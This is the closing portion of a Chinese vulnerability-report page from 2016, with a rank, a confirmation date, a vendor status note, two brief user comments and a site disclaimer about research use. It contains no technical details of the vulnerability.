漏洞Rank:18

确认时间:2016-04-22 11:07

厂商回复:

目前正在处理,

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-16 14:07 | prolog ( 普通白帽子 | Rank:944 漏洞数:140 )

    1

    66666

  2. 2016-04-20 15:59 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    0

    叼~

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin